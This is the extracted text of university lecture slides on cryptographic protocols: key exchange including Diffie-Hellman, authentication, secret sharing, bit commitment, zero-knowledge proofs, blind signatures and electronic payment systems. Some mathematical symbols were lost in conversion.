Download as pdf or txt
Download as pdf or txt
You are on page 1of 458

Cryptographic Protocols I

Van Nguyen – HUST


Hanoi – 2010
◼ Slides can be downloaded from lecturer’s
personal web:

http:\\soict.hust.edu.vn\~vannk

Network Security
Email: vannk@soict.hust.edu.vn
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 2
Agenda

Cryptographic Basic Protocols:


Protocols: basic Key Exchange,
concepts Authentication,
Secret Sharing

Intermediate
Advanced protocols: special
protocols: ZKP, DSs , Bit
Blind Signatures commitment and
more

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 3
Cryptographic Protocol: basic idea
◼ Cryptography solves problems that involve
secrecy, authentication, integrity, and dishonest
people.
◼ A protocol is a series of steps, involving two or
more parties, designed to accomplish a task.
❑ “series of steps”: the protocol has a sequence, from start to finish.
◼ Every step must be executed in turn, and no step can be taken before the
previous step is finished.
❑ “Involving two or more parties”: at least two people are required to
complete the protocol
◼ one person alone does not make a protocol. A person alone can perform a
series of steps to accomplish a task, but this is not a protocol.
❑ “designed to accomplish a task”: the protocol must achieve
something.
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 4
Cryptographic Protocol: other
characteristics
◼ Everyone involved in the protocol must
❑ know the protocol and all of the steps to follow in advance
❑ agree to follow it
◼ The protocol must be unambiguous:
❑ each step must be well defined
❑ there must be no chance of a misunderstanding
◼ The protocol must be complete:
❑ there must be a specified action for every possible situation

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 5
◼ A cryptographic protocol involves some cryptographic
algorithm, but generally the goal of the protocol is
something beyond simple secrecy.
◼ The parties might want
❑ to share parts of their secrets to compute a value,
❑ jointly generate a random sequence
❑ convince one another of their identity
❑ or simultaneously sign a contract.
◼ The whole point of using cryptography in a protocol is to
prevent or detect eavesdropping and cheating
❑ — It should not be possible to do more or learn more than what is
specified in the protocol.

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 6
List of regular players
◼ Alice: First participant in all the protocols
◼ Bob: Second participant in all the protocols
◼ Carol: Participant in the three- and four-party protocols
◼ Dave: Participant in the four-party protocols
◼ Eve: Eavesdropper
◼ Mallory: Malicious active attacker
◼ Trent: Trusted arbitrator
◼ Walter: Warden who will be guarding Alice and Bob in
some protocols
◼ Peggy: the Prover
◼ Victor: the Verifier
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 7
Arbitrated Protocols
◼ Arbitrator: disinterested third party trusted to help
complete a protocol between two mutually distrustful
parties.
◼ In the real world, lawyers are often used as arbitrators.
❑ E.g. Alice is selling a car to Bob, a stranger. Bob wants to pay by
check, but Alice has no way of knowing if the check is good.
❑ Enter a lawyer trusted by both. With his help, Alice and Bob can
use the following protocol to ensure that neither cheats the other:
(1) Alice gives the title to the lawyer
(2) Bob gives the check to Alice.
(3) Alice deposits the check.
(4) After waiting a specified time period for the check to clear, the lawyer gives the
title to Bob. If the check does not clear within the specified time period, Alice
shows proof of this to the lawyer and the lawyer returns the title to Alice.

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 8
Adjudicated Protocols

◼ Because of the high cost of hiring arbitrators,


arbitrated protocols can be subdivided into 2
subprotocols
❑ Non-arbitrated subprotocol, executed every time
parties want to complete the protocol.
❑ an arbitrated subprotocol, executed only in
exceptional circumstances— when there is a dispute.

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 9
Adjudicated Protocols
◼ Example: The contract-signing protocol can be
formalized in this way:
❑ Nonarbitrated subprotocol (executed every time):
◼ (1) Alice and Bob negotiate the terms of the contract.
◼ (2) Alice signs the contract.
◼ (3) Bob signs the contract.
❑ Adjudicated subprotocol (executed only in case of a
dispute):
◼ (4) Alice and Bob appear before a judge.
◼ (5) Alice presents her evidence.
◼ (6) Bob presents his evidence.
◼ (7) The judge rules on the evidence.

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 10
Self-Enforcing Protocols
◼ A self-enforcing protocol is the best type of protocol: The
protocol itself guarantees fairness.
❑ No arbitrator is required to complete the protocol.
❑ No adjudicator is required to resolve disputes.
◼ The protocol is constructed so that there cannot be any
disputes
❑ If one of the parties tries to cheat, the other party immediately
detects the cheating and the protocol stops.
◼ Unfortunately, there is not a self-enforcing protocol for
every situation

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 11
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 12
Key Exchange with Symmetric Cryptography
◼ Assume that Alice and Bob each share a secret key with
the Key Distribution Center (KDC)—Trent in our
protocols.
❑ These keys must be in place before the start of the protocol
(1) Alice calls Trent and requests a session key to communicate with
Bob.
(2) Trent generates a random session key. He encrypts two copies
of it: one in Alice’s key and the other in Bob’s key. Trent sends
both copies to Alice.
(3) Alice decrypts her copy of the session key.
(4) Alice sends Bob his copy of the session key.
(5) Bob decrypts his copy of the session key.
(6) Both Alice and Bob use this session key to communicate
securely.
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 13
Key Exchange with Public-Key Cryptography

◼ Alice and Bob use public-key cryptography to agree on a


session key, and use that session key to encrypt data.
◼ In some practical implementations, both Alice’s and
Bob’s signed public keys will be available on a database.

(1) Alice gets Bob’s public key from the KDC.


(2) Alice generates a random session key, encrypts it using Bob’s
public key, and sends it to Bob.
(3) Bob then decrypts Alice’s message using his private key.
(4) Both of them encrypt their communications using the same
session key.

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 14
Man-in-the-Middle Attack
◼ Mallory is a lot more powerful than Eve
❑ can also modify messages, delete messages, and generate totally
new ones
◼ Mallory can imitate Bob when talking to Alice and imitate
Alice when talking to Bob
(1) Alice sends Bob her pk. Mallory intercepts this key and sends Bob
his own pk.
(2) Bob sends Alice his pk. Mallory intercepts, sends Alice his own pk.
(3) When Alice sends a message to Bob, encrypted in “Bob’s” pk,
Mallory intercepts it:
Since the message is really encrypted with his own public key, he decrypts it with his
private key, re-encrypts it with Bob’s public key, and sends it on to Bob.
(4) When Bob sends a message to Alice, encrypted in “Alice’s” pk,
Mallory intercepts it: he decrypts it with his private key, re-encrypts it
with Alice’s public key, and sends it on to Alice.
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 15
◼ The interlock protocol, invented by Ron Rivest and Adi
Shamir can protect against the man-in-the-middle attack.
(1) Alice sends Bob her public key.
(2) Bob sends Alice his public key.
(3) Alice encrypts her message using Bob’s public key. She sends half
of the encrypted message to Bob.
(4) Bob encrypts his message using Alice’s public key. He sends half of
the encrypted message to Alice.
(5) Alice sends the other half of her encrypted message to Bob.
(6) Bob puts the two halves of Alice’s message together and decrypts it
with his private key. Bob sends the other half of his encrypted
message to Alice.
(7) Alice puts the two halves of Bob’s message together and decrypts it
with her private key.
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 16
Authentication
◼ When Alice logs into a host computer (or an ATM, …),
how does the host know who she is? How does the host
know she is not Eve trying to falsify Alice’s identity?
❑ Traditionally, passwords solve this problem. Alice enters her
password, and the host confirms that it is correct.
❑ Both Alice and the host know this secret piece of knowledge and
the host requests it from Alice every time she tries to log in.
◼ Authentication Using One-Way Functions
❑ the host does not need to know the passwords:just has to be able
to differentiate valid passwords from invalid passwords.
❑ (1) Alice sends the host her password.
❑ (2) The host performs a one-way function on the password.
❑ (3) The host compares the result of the one-way function to the
value it previously stored.
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 17
Authentication

◼ Dictionary Attacks and Salt


◼ SKEY
◼ Authentication Using Public-Key
Cryptography
◼ Mutual Authentication Using the Interlock
Protocol
◼ SKID

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 18
Authentication and Key Exchange
◼ Needham-Schroeder
(1) Alice sends a message to Trent consisting of her name, Bob’s name, and a random
number: A,B,RA
(2) Trent generates a random session key. He encrypts a message consisting of a random
session key and Alice’s name with the secret key he shares with Bob. Then he
encrypts Alice’s random value, Bob’s name, the key, and the encrypted message with
the secret key he shares with Alice, and sends her the encrypted:
EA (RA,B,K,EB(K,A))
(3) Alice decrypts the message and extracts K. She confirms that RA is the same value
that she sent Trent in step (1). Then she sends Bob the message that Trent encrypted
in his key: EB (K,A)
(4) Bob decrypts the message and extracts K. He then generates another random value,
RB. He encrypts the message with K and sends it to Alice. E K(RB)
(5) Alice decrypts the message with K. She generates RB - 1 and encrypts it with K. Then
she sends the message back to Bob: EK(RB – 1)

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 19
Authentication and Key Exchange

◼ Otway-Rees:
❑ Fix the replay attack to Needham-Schroeder’s
◼ Kerberos
◼ DASS
◼ Denning-Sacco

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 20
Secret Spliting
◼ There are ways to take a message and divide it up into
pieces
❑ Each piece by itself means nothing, but put them together and the
message appears.
◼ The simplest sharing scheme splits a message between two
people:
(1) Trent generates a random-bit string, R, the same length as the
message, M.
(2) Trent XORs M with R to generate S: M  R = S
(3) Trent gives R to Alice and S to Bob
To reconstruct the message, Alice and Bob have only one step to do:
(4) Alice and Bob XOR their pieces together to reconstruct the message:
❑ R S =M

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 21
Secret Sharing
◼ A threshold scheme can take any message (a secret
recipe, launch codes etc.) and divide it into n pieces,
called shadows or shares, such that any m of them can
be used to reconstruct the message. More precisely, this
is called an (m,n)-threshold scheme.
❑ With a (3,4)-threshold scheme, Trent can divide his secret sauce
recipe among Alice, Bob, Carol, and Dave, such that any three of
them can put their shadows together and reconstruct the
message.
❑ If Carol is on vacation, Alice, Bob, and Dave can do it. If Bob gets
run over by a bus, Alice, Carol, and Dave can do it. However, if
Bob gets run over by a bus while Carol is on vacation, Alice and
Dave can’t reconstruct the message by themselves.

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 22
Special Digital Signatures

◼ Undeniable signatures
◼ Designated confirmer signatures
◼ Proxy Signatures
◼ Group Signatures
◼ Fail-Stop Digital Signatures

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 23
Bit Commitment
◼ Using symmetric cryptography:
(1) Bob generates a random-bit string, R, and sends it to Alice
(2) Alice creates a message consisting of the bit she wishes to
commit to, b (it can actually be several bits), and Bob’s
random string. She encrypts it with some random key, K,
and sends to Bob: EK (R,b)
That is the commitment portion of the protocol. Bob cannot
decrypt the message, so he does not know what the bit is.
◼ When it comes time for Alice to reveal her bit, the protocol
continues:
(3) Alice sends Bob the key.
(4) Bob decrypts the message to reveal the bit. He checks his random
string to verify the bit’s validity

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 24
Bit Commitment
◼ Using one-way functions:
(1) Alice generates two random-bit strings, R1 and R2.
(2) Alice creates a message consisting of her random strings and
the bit she wishes to commit to (it can actually be several
bits).Then computes the one-way function on the message and
sends the result, as well as one of the random strings, to Bob:
H(R1,R2,b),R1
◼ When it comes time for Alice to reveal her bit, the
protocol continues:
(3) Alice sends Bob the original message: (R1,R2,b)
(4) Bob computes the one-way function on the message and
compares it and R1, with the value and random string he
received in step (3). If they match, the bit is valid.

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 25
Fair Coin Flips

◼ Can use Bit Commitment Protocol


◼ Coin Flipping Using One-Way Functions
Assume Alice and Bob agree on a one-way function f:
(1) Alice chooses a random number, x. She computes y = f(x),
(2) Alice sends y to Bob.
(3) Bob guesses whether x is even or odd and sends his guess to
Alice.
(4) If Bob’s guess is correct, the result of the coin flip is heads. If
Bob’s guess is incorrect, the result of the coin flip is tails. Alice
announces the result of the coin flip and sends x to Bob.
(5) Bob confirms that y = f(x).

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 26
Zero-Knowledge Proofs
◼ Alice: “I know the password to the Federal Reserve System
computer, the ingredients in McDonald’s secret sauce, and
the contents of Volume 4 of Knuth.”
◼ Bob: “No, you don’t.”
◼ Alice: “Yes, I do.”
◼ Bob: “Do not!”
◼ Alice: “Do too!”
◼ Bob: “Prove it!”
◼ Alice: “All right. I’ll tell you.” She whispers in Bob’s ear.
◼ Bob: “That’s interesting. Now I know it, too. I’m going to tell
The Washington Post.”
◼ Alice: “Oops.”
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 27
Zero-Knowledge Proofs
◼ Using one-way functions, Peggy could perform a zero-
knowledge proof.
❑ This protocol proves to Victor that Peggy does have a piece of
information BUT
❑ It does not give Victor any way to know what the information is.
◼ These proofs take the form of interactive protocols. Victor
asks Peggy a series of questions.
❑ If Peggy knows the secret, she can answer all the questions
correctly.
◼ After 10 or so questions ➔ Victor will be convinced.
❑ If she does not, she has some chance—50 percent chance
❑ Yet none of the questions or answers gives Victor any information
about Peggy’s information—only about her knowledge of it.
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 28
Zero-Knowledge Proofs

◼ The cave has a secret.


❑ Someone who knows the magic
words can open the secret door
between C and D.
❑ To everyone else, both passages
lead to dead ends.
◼ Peggy knows the secret of the
cave.
❑ She wants to prove her knowledge
to Victor, but she doesn’t want to
reveal the magic words.

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 29
Blind Signatures
◼ An essential feature of digital signature protocols is that the
signer knows what he is signing.
◼ We might want people to sign documents without ever seeing
their contents.
❑ Bob is a notary public. Alice wants him to sign a document, but does
not want him to have any idea what he is signing.
◼ Bob doesn’t care what the document says; he is just certifying that he notarized it at a
certain time. He is willing to go along with this.
❑ (1) Alice takes the document and multiplies it by a random value. This
random value is called a blinding factor.
❑ (2) Alice sends the blinded document to Bob.
❑ (3) Bob signs the blinded document.
❑ (4) Alice divides out the blinding factor, leaving the original document
signed by Bob.
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 30
Blind Signatures

◼ The properties of completely blind signatures are:


1. Bob’s signature on the document is valid.
❑ The signature is a proof that Bob signed the document.
❑ It will convince Bob that he signed the document if it is ever
shown to him.
❑ It also has all of the other properties of digital signatures.
2. Bob cannot correlate the signed document with the act of
signing the document.
❑ Even if he keeps records of every blind signature he makes, he
cannot determine when he signed any given document.

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 31
Cryptographic Protocols II

Van Nguyen – HUT


Hanoi – 2010
Agenda

Cryptographic Key Exchange:


Protocols: basic Diffie-Hellman
concepts protocol

Zero-Knowledge
Blind Signatures Protocols

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 2
Whittfield Diffie and Martin Hellman are called the inventors of
Public Key Cryptography. Diffie-Hellman Key Exchange is the first
Public Key Algorithm published in 1976.

DIFFIE-HELLMAN KEY
EXCHANGE
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 3
What is Diffie-Hellman?

◼ A Public Key Algorithm


◼ Only for Key Exchange
◼ Does NOT Encrypt or Decrypt
◼ Based on Discrete Logarithms
◼ Widely used in Security Protocols and
Commercial Products
◼ Williamson of Britain’s CESG claims to have
discovered it several years prior to 1976

4
Discrete Logarithms

◼ What is a logarithm?
◼ log10100 = 2 because 102 = 100
◼ In general if logmb = a then ma = b
◼ Where m is called the base of the logarithm
◼ A discrete logarithm can be defined for
integers only
◼ In fact we can define discrete logarithms
mod p also where p is any prime number

5
Discrete Logarithm Problem

◼ The security of the Diffie-Hellman algorithm


depends on the difficulty of solving the
discrete logarithm problem (DLP) in the
multiplicative group of a finite field

6
Sets, Groups and Fields

◼ A set is any collection of objects called the


elements of the set
◼ Examples of sets: R, Z, Q
◼ If we can define an operation on the elements
of the set and certain rules are followed then
we get other mathematical structures called
groups and fields

7
Groups
◼ A group is a set G with a custom-defined binary
operation + such that:
❑ The group is closed under +, i.e., for a, b  G:
◼ a+bG
❑ The Associative Law holds i.e., for any a, b, c  G:
◼ a + (b + c) = (a + b) + c
❑ There exists an identity element 0, such that
◼ a+0=a
❑ For each a  G there exists an inverse element –a
such that
◼ a + (-a) = 0
◼ If for all a, b  G: a + b = b + a then the group is
called an Abelian or commutative group
◼ If a group G has a finite number of elements it is
called a finite group
8
More About Group Operations

◼ + does not necessarily mean normal


arithmetic addition
◼ + just indicates a binary operation which can
be custom defined
◼ The group operation could be denoted as •
◼ The group notation with + is called the
additive notation and the group notation with •
is called the multiplicative notation

9
Fields

◼ A field is a set F with two custom-defined binary


operations + and • such that:
❑ The Field is closed under + and •, i.e., for a, b  F:
◼ a + b  F and a • b  F
❑ The Associative Law holds i.e., for any a, b, c  F:
◼ a + (b + c) = (a + b) + c and a • (b • c) = (a • b) • c
❑ There exist identity elements 0 and 1, such that
◼ a + 0 = a and a • 1 = a
❑ For each a  F there exist inverse elements –a and a-
1such that

◼ a + (-a) = 0 and a • a-1 = 1


◼ If a field F has a finite number of elements it is
called a finite field
10
Examples of Groups
◼ Groups
❑ Set of real numbers R under +
❑ Set of real numbers R under *
❑ Set of integers Z under +
❑ Set of integers Z under *?
❑ Set of integers modulo a prime number p under +
❑ Set of integers modulo a prime number p under *
❑ Set of 3 X 3 matrices under + meaning matrix addition
❑ Set of 3 X 3 matrices under * meaning matrix
multiplication?
◼ Fields
❑ Set of real numbers R under + and *
❑ Set of integers Z under + and *
❑ Set of integers modulo a prime number p under + and *
11
Generator of Group
◼ If for a  G, all members of the group can be
written in terms of a by applying the group
operation * on a a number of times then a is
called a generator of the group G
◼ Examples
❑ 2 is a generator of Z*11
❑ 2 and 3 are generator of Z*19

m 1 2 3 4 5 6 7 8 9 10

2m mod 11 2 4 8 5 10 9 7 3 6 1

m 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

2m mod 19 2 4 8 16 13 7 14 9 18 17 15 11 3 6 12 5 10 1
3m mod 19 3 9 8 5 15 7 2 6 18 16 10 11 14 4 12 17 13 1
12
Primitive Roots
◼ If an = x then a is called the n-th root of x
◼ For any prime number p, if we have a number a
such that powers of a mod p generate all the
numbers between 1 to p-1 then a is called a
Primitive Root of p.
◼ In terms of the Group terminology a is the generator
element of the multiplicative group of the finite field
formed by mod p
◼ Then for any integer b and a primitive root a of prime
number p we can find a unique exponent i such that
b = ai mod p
◼ The exponent i is referred to as the discrete
logarithm or index, of b for the base a.
13
14
15
Diffie-Hellman Algorithm

◼ Five Parts
1. Global Public Elements
2. User A Key Generation
3. User B Key Generation
4. Generation of Secret Key by User A
5. Generation of Secret Key by User B

16
Global Public Elements

◼ q Prime number
◼   < q and  is a primitive root
of q
◼ The global public elements are also
sometimes called the domain parameters

17
User A Key Generation

◼ Select private XA XA < q


◼ Calculate public YA YA =  XA mod q

18
User B Key Generation

◼ Select private XB XB < q


◼ Calculate public YB YB =  XB mod q

19
Generation of Secret Key by User A

◼ K = (YB)XA mod q

20
Generation of Secret Key by User B

◼ K = (YA)XB mod q

21
Diffie-Hellman Key Exchange

22
Diffie-Hellman Example

◼ q = 97
◼ =5
◼ XA = 36
◼ XB = 58
◼ YA = 536 = 50 mod 97
◼ YB = 558 = 44 mod 97
◼ K = (YB)XA mod q = 4436 mod 97 = 75 mod 97
◼ K = (YA)XB mod q = 5058 mod 97 = 75 mod 97
23
Why Diffie-Hellman is Secure?

◼ Opponent has q, , YA and YB


◼ To get XA or XB the opponent is forced to take
a discrete logarithm
◼ The security of the Diffie-Hellman Key
Exchange lies in the fact that, while it is
relatively easy to calculate exponentials
modulo a prime, it is very difficult to calculate
discrete logarithms. For large primes, the
latter task is considered infeasible.
24
Homework: Man-in-the-middle-attack

◼ Find out yourself (maybe from the Internet)


how this attack can be implemented
successfully against Diffie-Hellman protocol
◼ Suggest a way to prevent against this attack

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 25
ZERO-KNOWLEDGE
PROTOCOLS
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 26
The Cave of the Forty Thieves
The Cave of the Forty Thieves
Properties of Zero-Knowledge Proofs

◼ Completeness – A prover who knows the


secret information can prove it with
probability 1.
◼ Soundness – The probability that a prover
who does not know the secret information
can get away with it can be made arbitrarily
small.
Identification

◼ Alice is identified by some secret she alone is


known to possess - e.g. a password
◼ Problems
❑ The authenticator must be trusted
❑ If secret sniffed or given to untrusted party, can
impersonate
◼ Use zero knowledge!
Fiat-Shamir Identification

One time setup:


◼ Trusted center published modulus n=pq, but
keeps p and q secret
◼ Alice selects a secret prime s comprime to n,
computes v=s2 mod n, and registers v with
the trusted center as its public key
Fiat-Shamir Identification

Protocol messages:
A → B: x = r mod n
2

B → A: e from {0, 1}
A → B: y = rse mod n
Fiat-Shamir Identification

Protocol messages:
A → B: x = r mod
If e=0, then the
2 n
response y=r is
independent of secret

B → A: e from {0, 1}
s

A → B: y = rse mod n
Fiat-Shamir Identification

Protocol messages:
A → B: x = r mod n
2

B → A: e from {0, 1}
A → B: y = rse mod n
If e=1, then information pairs (x, y) can
be simulated by choosing y randomly,
and setting x=y2 /v mod n
Bit Commitments and Zero-Knowledge

◼ Bit commitments are used in zero-knowledge


proofs to encode the secret information.
◼ For example, zero-knowledge proofs based
on graph colorations exist. In this case, bit
commitment schemes are used to encode the
colors.
◼ Complex zero-knowledge proofs with large
numbers of intermediate steps that must be
verified also use bit commitment schemes.
Bit Commitments

◼ “Flipping a coin down a well”


◼ “Flipping a coin by telephone”
◼ A value of 0 or 1 is committed to by the
prover by encrypting it with a one-way
function, creating a “blob”. The verifier can
then “unwrap” this blob when it becomes
necessary by revealing the key.
Bit Commitment Properties

◼ Concealing – The verifier cannot determine


the value of the bit from the blob.
◼ Binding – The prover cannot open the blob as
both a zero and a one.
Bit Commitments: An Example
◼ Let n = pq, where p and q are prime. Let m be a
quadratic nonresidue modulo n. The values m and n are
public, and the values p and q are known only to Peggy.
◼ Peggy commits to the bit b by choosing a random x and
sending Vic the blob mbx2.
◼ When the time comes for Vic to check the value of the
bit, Peggy simply reveals the values b and x.
◼ Since no known polynomial-time algorithm exists for
solving the quadratic residues problem modulo a
composite n whose factors are unknown, hence this
scheme is computationally concealing.
◼ On the other hand, it is perfectly binding, since if it
wasn’t, m would have to be a quadratic residue, a
contradiction.
“fake” ZKP
◼ Consider this simple protocol
1. If the prover claims to be A, the verifier chooses a
random message M, and sends the ciphertext C =
PA(M) to the prover.
2. The prover decrypts C using SA and sends the result
M’ to the verifier.
3. The verifier accepts the identity of the prover if and
only if M’ = M.
◼ At first sight, it may seem OK:
❑ V already knows M
◼ But WRONG! What if the verifier is an adversary?
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 39
Fixed protocol
1. If P claims to be A, V chooses a random
message M, and sends C = PA (M) to P
2. P decrypts C using SA and sends V a
commitment to the result commitpk(r,M’)
3. V ➔ P: M.
4. P checks if M = M’. If not he stops the protocol.
Otherwise he opens the commitment P➔V: r,M
5. V accepts the identity of the prover if and only if
M’ = M and the pair r,M’ correctly opens the
commitment
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 40
Another Example of ZKP

◼ Peggy the prover would like to show Vic the verifier that
an element b is a member of the subgroup of Z n*
generated by , where  has order l. (i.e., does k = b
for some k such that 0 ≤ k ≤ l?)
◼ Peggy chooses a random j, 0 ≤ j ≤ l – 1, and sends Vic
j.
◼ Vic chooses a random i = 0 or 1, and sends it to Peggy.
◼ Peggy computes j + ik mod l, and sends it to Vic.
◼ Vic checks that j + ik = jik = jbi.
◼ They then repeat the above steps log2n times.
◼ If Vic’s final computation checks out in each round, he
accepts the proof.
Complexity Theory

◼ The last proof works because the problem of


solving discrete logarithms is NP-complete
(or is believed to be, at any rate).
◼ It has been shown that all problems in NP
have a zero-knowledge proof associated with
them.
Computational Assumptions

◼ A zero-knowledge proof assumes the prover


possesses unlimited computational power.
◼ It is more practical in some cases to assume
that the prover’s computational abilities are
bounded. In this case, we have a zero-
knowledge argument.
Proof vs. Argument

Zero-Knowledge Proof: Zero-Knowledge Argument:


◼ Unconditional ◼ Unconditional
completeness completeness
◼ Unconditional soundness ◼ Computational

◼ Computational zero- soundness


knowledge ◼ Perfect zero-knowledge

◼ Unconditionally binding ◼ Computationally binding


blobs blobs
◼ Computationally ◼ Unconditionally
concealing blobs concealing blobs
Applications

◼ Zero-knowledge proofs can be applied where


secret knowledge too sensitive to reveal
needs to be verified
◼ Key authentication
◼ PIN numbers
◼ Smart cards
Limitations

◼ A zero-knowledge proof is
only as good as the secret
it is trying to conceal
◼ Zero-knowledge proofs of
identities in particular are
problematic
◼ The Grandmaster Problem
◼ The Mafia Problem
◼ etc.
Network Security
Van K Nguyen - HUT

Electronic Payment Systems: Overview


Agenda

◼ Electronic commerce concepts


◼ Electronic payment systems overview
◼ E-payment security
◼ Payment security services

◼ Material in this twin lecture is based on this


book: “Security Fundamental for Electronic
Commerce” by Vesna Hassler [Artech House and
Pedrick Moore, technical editor (2001) ]
Electronic commerce & secure transactions
◼ E-commerce can be defined as any transaction involving
some exchange of value over a communication network
❑ Business-to-business transactions, such as EDI (e- data interchange)
◼ usually referred to as e-business
❑ Customer-to-business transactions, such as online shops on the Web
◼ customer-to-bank transactions as e-banking
❑ Customer-to-customer transactions, such as transfer btw e-wallets
❑ Customers/businesses-to-public administration transactions, such as
filing of electronic tax returns
◼ Also usually referred to as e-government.

◼ Here we care: Customer-to-business transactions


❑ on the electronic payment systems that provide a secure way to
exchange value between customers and businesses
Information Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 3
Electronic Payment Systems
◼ E-payment systems evolved from traditional payment
systems
❑ Both have much in common
❑ But e-payment systems are much more powerful, because of the
advanced security techniques that have no analogs in traditional
payment systems.
◼ An e-payment system denotes any kind of network
service that provides the exchange of money for goods or
services:
❑ physical goods: books, CDs …
❑ electronic goods: e- documents, images, or music files
❑ traditional services: hotel or flight booking
❑ e-services, such as financial market analyses in electronic form

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 4
A typical e-payment system
◼ The provider runs a payment gateway
❑ reachable from the public network (Internet) and from a private
interbank clearing network.
❑ serves as an intermediary between the traditional payment
infrastructure and the e-payment infrastructure.
◼ In order to participate in, a customer and a merchant must
❑ be able to access the Internet
❑ register with the corresponding payment service provider.
❑ each have a bank account at a bank that is connected to the
clearing network.
◼ The customer’s bank is usually referred to as the issuer bank
◼ The term issuer bank denotes the bank that actually issued the payment
instrument (e.g., debit or credit card) that the customer uses for payment
◼ The acquirer bank acquires payment records (i.e., paper charge slips or e-data)
from the merchants
Information Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 5
A typical e-payment system
◼ On purchase of goods/services,
C pays a certain amount of
money to M with debit/credit card.
❑ Before supplying goods/services, M
asks gateway G to authorize C and his
payment instrument (card number …)
❑ G contacts the issuer bank to check.
❑ If all fine, money is withdrawn (or
debited) from the C’s account and
deposited in (or credited to) M’s
account
❑ G notifies of the successful payment
to the merchant ➔ M supply the
ordered items to C.

◼ In some cases, e.g. for low-cost services, delivery can be made before
the actual payment authorization/transaction
Information Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 6
Off-line vs. On-line
◼ Off-line systems: no current connections from the
customer/merchant to their respective banks
❑ M can’t authorize C with the issuer’s bank
❑ Also, it is difficult to prevent C from spending more money than
actually possesses
➔ most proposed Internet payment systems are online.
◼ Online systems:
❑ Require online presence of an authorization server, which can be a
part of the issuer or the acquirer bank.
❑ requires more communication, but it is more secure than off-line
systems
◼ However, off-line still possible e.g. in some e-cash systems
❑ using some special strong cryptographic tools

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 7
Debit-based vs. credit-based systems

◼ In a credit-based payment system (e.g., credit


cards) the charges are posted to the payer’s
account
❑ The payer later pays the accumulated amounts to the
payment service.
◼ In a debit-based payment system
❑ e.g., debit cards, checks
❑ the payer’s account is debited immediately, that is, as
soon as the transaction is processed

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 8
Micro vs. macro

◼ Macro-payment: relatively large amounts of money can


be exchanged
◼ Micropayment system: small payments
❑ e.g., up to 5 euros
◼ The order of magnitude plays a significant role in the
design of a system and its security policies.
❑ It makes no sense to implement expensive security protocols to
protect e- coins of low value.
◼ In such a case, should instead prevent large-scale attacks in which huge
numbers of coins can be forged or stolen.

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 9
Payment instruments
◼ Traditional payment instruments
❑ Paper money, credit cards and checks
◼ E-payment systems introduced new instruments:
❑ electronic money (also called digital money)
❑ electronic checks
◼ Two main groups of instruments
❑ cash-like: money taken from account before payment
◼ payer withdraws a certain amount of money (e.g., paper money,
electronic money) from his account
❑ check-like: after
◼ payer sends a payment order to the payee ➔ the money will be withdrawn from
the payer’s account and deposited into the payee’s.
◼ The payment order: paper e.g., a bank-transfer slip, or an e-document e.g. an e-
check.

Information Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 10
Payment using credit cards

◼ Most popular
❑ The first credit cards were introduced decades ago (Diner’s Club
in 1949, American Express in 1958)
◼ Material
❑ For a long time, most are with magnetic stripes containing
unencrypted, read-only information
❑ Now, many are smart cards containing hardware devices (chips)
offering encryption and far greater storage capacity
❑ Recently even virtual credit cards (software electronic wallets),
such as one by Trintech Cable & Wireless

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 11
Typical credit card transaction
(1) C sends M credit card info (i.e., issuer, expiry date, number)
(2) M asks the acquirer bank A for authorization
(3) A checks with I - the issuer bank then A notifies M if approved.
(4) M send the ordered goods/services to C
(5a) M present the charge (or a batch of several transactions) to A

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 12
Typical credit
card transaction

(6) Settlement:
❑ A sends a settlement request to I; I places the money into an interbank settlement
account and charges the amount of sale to C’s credit card account.
(7) Notification
❑ At regular intervals (e.g., monthly) I notifies C of the transactions and their
accumulated charge
❑ C pays the charges by some other means (e.g., direct debit order, bank transfer,
check).
(5b) A has obtained the amount of sale from the interbank settlement
account and credited M’s account

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 13
Using credit cards: security problems

◼ Generally, fraudulent use of credit card numbers stems


from
❑ eavesdroppers
